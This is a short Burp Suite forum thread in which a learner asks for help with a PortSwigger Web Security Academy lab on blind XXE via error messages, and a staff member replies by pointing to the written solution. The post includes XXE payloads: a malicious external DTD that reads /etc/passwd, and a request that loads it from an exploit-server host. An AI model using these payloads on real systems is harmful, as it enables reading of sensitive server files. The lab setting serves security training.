Burp Suite User Forum

Not able to complete - https://portswigger.net/web-security/xxe/blind/lab-xxe-with-data-retrieval-via-error-messages

Shreenivas | Last updated: Feb 17, 2023 07:18PM UTC

Hello, I get the below error.

"XML parser exited with error: org.xml.sax.SAXParseException; lineNumber: 1; columnNumber: 108; Premature end of file."

Here are my payloads.

Exploit server:

<!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">

POST /product/stock

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0aa90096041d3934c306397401aa007e.exploit-server.net/exploit.dtd"> %eval; %exfil; %xxe;]><stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>

I have changed the endpoint to exploit.dtd

Ben, PortSwigger Agent | Last updated: Feb 20, 2023 09:43AM UTC

Hi Shreenivas, Have you tried following the written solution?
